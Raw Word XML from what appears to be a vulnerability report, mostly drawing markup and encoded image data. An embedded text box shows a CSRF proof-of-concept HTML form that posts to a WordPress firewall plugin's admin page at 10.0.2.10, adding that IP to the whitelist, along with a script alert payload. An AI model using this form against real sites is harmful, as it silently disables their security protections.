x7vgODmZz89f69YT64XRxxD50lDslAgkGpvO2o0vL1W81sQIRqypveEGr4wwLq8vChM&#10;bv2JXvC4iY3gEAq50dDGOORShrpFZ8LCD0h8+/CjM5Hl2Eg7mhOHu14ulVpJZzriD60Z8KHF+nNz&#10;cBpC9Y776ntWz9Q2bTwu94/PT0br66vp/g5ExCn+meGMz+hQMtPOH8gG0bNWWcpWHm7SJANxtiSZ&#10;WoHY/e5kWcj/NcofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACUEKvXMAQAAhAMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK8JI6XfAAAADgEA&#10;AA8AAAAAAAAAAAAAAAAAJgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAyBQAAAAA=&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C3BDD" w14:textId="6C125250" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1171"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9ACCEB" wp14:editId="0390FBA3">
                <wp:extent cx="5539740" cy="2804160"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="25"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539740" cy="2804160"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8724" cy="4416"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="26" name="AutoShape 19"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8724" cy="4416"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T1" fmla="*/ 3864 h 4416"/>
                              <a:gd name="T2" fmla="*/ 0 w 8724"/>
                              <a:gd name="T3" fmla="*/ 3864 h 4416"/>
                              <a:gd name="T4" fmla="*/ 0 w 8724"/>
                              <a:gd name="T5" fmla="*/ 4140 h 4416"/>
                              <a:gd name="T6" fmla="*/ 0 w 8724"/>
                              <a:gd name="T7" fmla="*/ 4416 h 4416"/>
                              <a:gd name="T8" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T9" fmla="*/ 4416 h 4416"/>
                              <a:gd name="T10" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T11" fmla="*/ 4140 h 4416"/>
                              <a:gd name="T12" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T13" fmla="*/ 3864 h 4416"/>
                              <a:gd name="T14" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T15" fmla="*/ 3312 h 4416"/>
                              <a:gd name="T16" fmla="*/ 0 w 8724"/>
                              <a:gd name="T17" fmla="*/ 3312 h 4416"/>
                              <a:gd name="T18" fmla="*/ 0 w 8724"/>
                              <a:gd name="T19" fmla="*/ 3588 h 4416"/>
                              <a:gd name="T20" fmla="*/ 0 w 8724"/>
                              <a:gd name="T21" fmla="*/ 3864 h 4416"/>
                              <a:gd name="T22" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T23" fmla="*/ 3864 h 4416"/>
                              <a:gd name="T24" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T25" fmla="*/ 3588 h 4416"/>
                              <a:gd name="T26" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T27" fmla="*/ 3312 h 4416"/>
                              <a:gd name="T28" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T29" fmla="*/ 2484 h 4416"/>
                              <a:gd name="T30" fmla="*/ 0 w 8724"/>
                              <a:gd name="T31" fmla="*/ 2484 h 4416"/>
                              <a:gd name="T32" fmla="*/ 0 w 8724"/>
                              <a:gd name="T33" fmla="*/ 2760 h 4416"/>
                              <a:gd name="T34" fmla="*/ 0 w 8724"/>
                              <a:gd name="T35" fmla="*/ 3036 h 4416"/>
                              <a:gd name="T36" fmla="*/ 0 w 8724"/>
                              <a:gd name="T37" fmla="*/ 3312 h 4416"/>
                              <a:gd name="T38" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T39" fmla="*/ 3312 h 4416"/>
                              <a:gd name="T40" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T41" fmla="*/ 3036 h 4416"/>
                              <a:gd name="T42" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T43" fmla="*/ 2760 h 4416"/>
                              <a:gd name="T44" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T45" fmla="*/ 2484 h 4416"/>
                              <a:gd name="T46" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T47" fmla="*/ 1932 h 4416"/>
                              <a:gd name="T48" fmla="*/ 0 w 8724"/>
                              <a:gd name="T49" fmla="*/ 1932 h 4416"/>
                              <a:gd name="T50" fmla="*/ 0 w 8724"/>
                              <a:gd name="T51" fmla="*/ 2208 h 4416"/>
                              <a:gd name="T52" fmla="*/ 0 w 8724"/>
                              <a:gd name="T53" fmla="*/ 2484 h 4416"/>
                              <a:gd name="T54" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T55" fmla="*/ 2484 h 4416"/>
                              <a:gd name="T56" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T57" fmla="*/ 2208 h 4416"/>
                              <a:gd name="T58" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T59" fmla="*/ 1932 h 4416"/>
                              <a:gd name="T60" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T61" fmla="*/ 1104 h 4416"/>
                              <a:gd name="T62" fmla="*/ 0 w 8724"/>
                              <a:gd name="T63" fmla="*/ 1104 h 4416"/>
                              <a:gd name="T64" fmla="*/ 0 w 8724"/>
                              <a:gd name="T65" fmla="*/ 1380 h 4416"/>
                              <a:gd name="T66" fmla="*/ 0 w 8724"/>
                              <a:gd name="T67" fmla="*/ 1656 h 4416"/>
                              <a:gd name="T68" fmla="*/ 0 w 8724"/>
                              <a:gd name="T69" fmla="*/ 1932 h 4416"/>
                              <a:gd name="T70" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T71" fmla="*/ 1932 h 4416"/>
                              <a:gd name="T72" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T73" fmla="*/ 1656 h 4416"/>
                              <a:gd name="T74" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T75" fmla="*/ 1380 h 4416"/>
                              <a:gd name="T76" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T77" fmla="*/ 1104 h 4416"/>
                              <a:gd name="T78" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T79" fmla="*/ 552 h 4416"/>
                              <a:gd name="T80" fmla="*/ 0 w 8724"/>
                              <a:gd name="T81" fmla="*/ 552 h 4416"/>
                              <a:gd name="T82" fmla="*/ 0 w 8724"/>
                              <a:gd name="T83" fmla="*/ 828 h 4416"/>
                              <a:gd name="T84" fmla="*/ 0 w 8724"/>
                              <a:gd name="T85" fmla="*/ 1104 h 4416"/>
                              <a:gd name="T86" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T87" fmla="*/ 1104 h 4416"/>
                              <a:gd name="T88" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T89" fmla="*/ 828 h 4416"/>
                              <a:gd name="T90" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T91" fmla="*/ 552 h 4416"/>
                              <a:gd name="T92" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T93" fmla="*/ 0 h 4416"/>
                              <a:gd name="T94" fmla="*/ 0 w 8724"/>
                              <a:gd name="T95" fmla="*/ 0 h 4416"/>
                              <a:gd name="T96" fmla="*/ 0 w 8724"/>
                              <a:gd name="T97" fmla="*/ 276 h 4416"/>
                              <a:gd name="T98" fmla="*/ 0 w 8724"/>
                              <a:gd name="T99" fmla="*/ 552 h 4416"/>
                              <a:gd name="T100" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T101" fmla="*/ 552 h 4416"/>
                              <a:gd name="T102" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T103" fmla="*/ 276 h 4416"/>
                              <a:gd name="T104" fmla="*/ 8724 w 8724"/>
                              <a:gd name="T105" fmla="*/ 0 h 44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Lst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="8724" h="4416">
                                <a:moveTo>
                                  <a:pt x="8724" y="3864"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4140"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4416"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="4416"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="4140"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3864"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="3312"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3312"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="2484"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="3312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="3036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="2760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="2484"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="1932"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1932"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2208"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="2484"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="2208"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1932"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="1104"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1380"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1932"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1932"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1656"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1380"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1104"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="552"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="1104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="552"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="8724" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8724" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="DADADA"/>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 name="Text Box 18"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="28" y="5"/>
                            <a:ext cx="692"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4B58F8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;form</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="28" name="Text Box 17"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1243" y="5"/>
                            <a:ext cx="1924"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D7AC14" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>method=“POST”</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="29" name="Text Box 16"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3688" y="5"/>
                            <a:ext cx="5030"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17F36B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>action=“</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0000FF"/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="thick" w:color="0000FF"/>
                                </w:rPr>
                                <w:t>http://10.0.2.10:8080/wordpress/wp-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="30" name="Text Box 15"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="28" y="281"/>
                            <a:ext cx="8071" cy="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E650A6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:ind w:right="18"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0000FF"/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="thick" w:color="0000FF"/>
                                </w:rPr>
                                <w:t>admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0000FF"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0000FF"/>
                                  <w:sz w:val="24"/>
                                  <w:u w:val="thick" w:color="0000FF"/>
                                </w:rPr>
                                <w:t>firewall-2.php</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&gt;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="31" name="Text Box 14"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="28" y="1109"/>
                            <a:ext cx="2406" cy="5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A69AD8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:ind w:right="-2"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;script&gt;alert(“Admin Submit”)&lt;/script&gt;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="32" name="Text Box 13"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2671" y="1109"/>
                            <a:ext cx="1035"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8E36D29" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Request.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="33" name="Text Box 12"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3938" y="1109"/>
                            <a:ext cx="4777"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5BB91A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:tabs>
                                  <w:tab w:val="left" w:pos="1039"/>
                                  <w:tab w:val="left" w:pos="2236"/>
                                  <w:tab w:val="left" w:pos="2716"/>
                                  <w:tab w:val="left" w:pos="3395"/>
                                  <w:tab w:val="left" w:pos="4185"/>
                                </w:tabs>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Enable</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>Security</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>to</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>this</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>web.</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:tab/>
                                <w:t>Click</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="34" name="Text Box 11"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="28" y="1937"/>
                            <a:ext cx="8690" cy="22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25FA94" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:spacing w:line="268" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;input type=“hid</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>den” name=“whitelisted_ip[]” value=“10.0.2.10”&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="110AA30F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="601E3F21" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;input type=“hidden” name=“set_whitelisted_ip” value=“Set Whitelisted IPs” class=“button-secondary”&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="0368B62D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="63218003" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;input type=“submit”&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="1738DE9D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="7BC0F99C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>&lt;/form&gt;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7D9ACCEB" id="Group 10" o:spid="_x0000_s1035" style="width:436.2pt;height:220.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8724,4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Kyt5wgAAK85AAAOAAAAZHJzL2Uyb0RvYy54bWzsW+2O21QQ/Y/EO1j+iUTj7zhRU1RaqJAK&#10;VGJ5AK/jfIgkNrZ3k/L0zIzvtSfO3puhSFmgqNI6qU/G98wZX89MJi+/Oe13zmNRN9vysHD9F57r&#10;FIe8XG4P64X76933X6eu07TZYZntykOxcD8WjfvNqy+/eHms5kVQbsrdsqgdMHJo5sdq4W7atppP&#10;Jk2+KfZZ86KsigOcXJX1Pmvhbb2eLOvsCNb3u0ngecnkWNbLqi7zomngf992J91XZH+1KvL259Wq&#10;KVpnt3BhbS39renvPf6dvHqZzdd1Vm22uVpG9gmr2GfbA1y0N/U2azPnod5emNpv87psylX7Ii/3&#10;k3K12uYFcQA2vjdi864uHyrisp4f11XvJnDtyE+fbDb/6fFD7WyXCzeIXeeQ7UEjuqzjk3OO1XoO&#10;mHd19Uv1oe4Ywsv3Zf5bA76bjM/j+3UHdu6PP5ZLsJc9tCU557Sq92gCaDsn0uBjr0Fxap0c/jOO&#10;w9k0AqlyOBekXuQnSqV8A1JefC7ffKc+mU6DqPtYBB9CZSfZvLskLVMtC0MDYq0Z3Nn8PXf+ssmq&#10;glRq0FXanYl252ugTxjHn+Gq8PKA0/5suDPZGYQ14PNPc6PFGdk8f2jad0VJWmSP75u2uwuW8IoU&#10;XqpAuAMZVvsd3BBfTRy06BzpoO6aHuYzWJgmkbNxtARwR/SwgME8g6mQYSymQOh+YSZTEM89JvIj&#10;z7Aq0KmHmUxNGQaZGUzBXtebsrhrxmAWa3ADisz53P0Woj73v2V5vlADn4tgs8eFCEM/MHgP7tmB&#10;r0kJn0thM8a1MBrjSoRxmhpWFnAlTMYCLoMldAOhDIFQBtz0JFGH+3uPs5HlMlhkDYRKBFwJmz0u&#10;RhClpl0klIgRcjFsxrgYJmVDrkQwTUw7SciVMBo7k8ELTXtJyGUwGhNqEAo1CLkGlrsLn899LFk0&#10;jbgMoZlsxGWw2RMqEXElbPa4GJYwibgYNntcD38Wmra6iOthEjfiYliMxVwMk7GYKxEEnmmri7kS&#10;RmNnMphv1VgoQyyUIRbKEHMZbGS5DBZZY6ESkKmKbouEi+H7nmmrSyRiJFwMmzEuhknZhCvhh6lp&#10;q0u4EkZjXAY/iU1bXcJlMBoTajAVajA908B8q065BpYYmZ7JYCY75TLY7AmVmHIlbPbOxDDH3JSL&#10;YbPH9Yhj006XcjlM2qZcC4stLoXRFtchDUz7XMplMNo608Dss1SoQSrUIBVqkHINzFxnXAOLpDOZ&#10;DDMug80cV8K0kcwkOsy4DkZLXASTojOuAKRyhoR/xgUw2uLeN0et7wnd73sy//ueUADf4wqY2UJg&#10;y55bvmcSAjota90+yDa6o5CfDq